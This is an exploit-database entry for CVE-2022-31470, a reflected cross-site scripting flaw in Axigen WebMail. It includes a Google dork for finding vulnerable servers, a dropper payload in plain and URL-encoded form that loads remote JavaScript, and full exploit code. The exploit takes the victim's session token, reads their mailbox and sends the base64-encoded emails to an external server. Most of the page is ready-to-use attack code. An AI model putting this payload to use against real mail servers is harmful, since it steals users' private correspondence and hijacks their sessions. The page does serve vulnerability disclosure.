Axigen 10.5.0–4370c946 Cross Site Scripting

2023.09.09

Credit: AmirZargham

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2022-31470

CWE: CWE-79

Dork: inurl:passwordexpired=yes

# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Date: 2023-08-21
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0–4370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470

Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.

Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.

');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
  document.body.appendChild(x)
})//



Encoded form

/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//


Exploit code

xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');

xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
    if (xhr1.readyState === XMLHttpRequest.DONE) {
        _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
        xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
        xhr2.setRequestHeader('Content-Type', 'application/json');
        xhr2.onreadystatechange = () => {
            if (xhr2.readyState === XMLHttpRequest.DONE) {
                if (xhr2.status === 401){
                    script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
                    document.body.appendChild(script_tag);
                } else {
                    resp = xhr2.responseText;
                    folderId = JSON.parse(resp)["mails"][0]["folderId"];
                    xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
                    xhr3.onreadystatechange = () => {
                        if (xhr3.readyState === XMLHttpRequest.DONE) {
                            emails = xhr3.responseText;
                            script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
                            document.body.appendChild(script_tag);
                        }
                    };
                    xhr3.send();
                }
            }
        };
        var body = JSON.stringify({isUnread: false});
        xhr2.send(body);
    }
};
xhr1.send();


Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Axigen 10.5.0&#8211;4370c946 Cross Site Scripting

Dork: inurl:passwordexpired=yes

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Axigen 10.5.0–4370c946 Cross Site Scripting

Thanks for you comment!
Your message is in quarantine 48 hours.